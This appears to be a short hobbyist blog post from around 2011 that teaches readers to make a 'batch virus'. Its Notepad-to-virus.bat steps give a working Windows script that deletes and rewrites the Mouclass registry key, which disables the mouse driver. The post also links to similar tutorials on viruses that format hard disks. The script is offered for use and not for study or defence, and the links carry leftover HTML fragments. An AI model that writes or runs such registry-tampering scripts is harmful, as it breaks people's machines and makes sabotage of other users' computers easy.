I had previously posted on making different batch files like http://androidtabletgadgets.blogspot.com /2011/12/advance-matrix-effects.html" target="_blank">matrix effect, http://androidtabletgadgets.blogspot.com /2011/12/how-to-open-number-of-sites-with-one.html" target="_blank">opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.
How To Disable Mouse
1. Open Notepad and copy below codesrem ---------------------------------2. Save this file as virus.bat
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
3. Done you just created your virus.
More Tutorial On Computer Viruses
- http://androidtabletgadgets.blogspot.com /2011/11/virus-to-format-hard-disk.html" target="_blank">Create Binary Virus To Format Hard Disk
- http://androidtabletgadgets.blogspot.com /2011/11/is-you-antivirus-working-perfect.html" target="_blank">Virus To Check If Antivirus Is Working Properly
- http://androidtabletgadgets.blogspot.com /2012/12/learn-to-make-dangerous-virus-in-minute.html" target="_blank">Make Dangerous Virus In A Minute
Thanks for reading my news about Make A Virus That Disable Mouse at my blog Tic Droid if you want too share this article, please put the resource, and if you think this article is very usefully dont forget to bookmark this site with CTRL + D on your keyboard to web browser.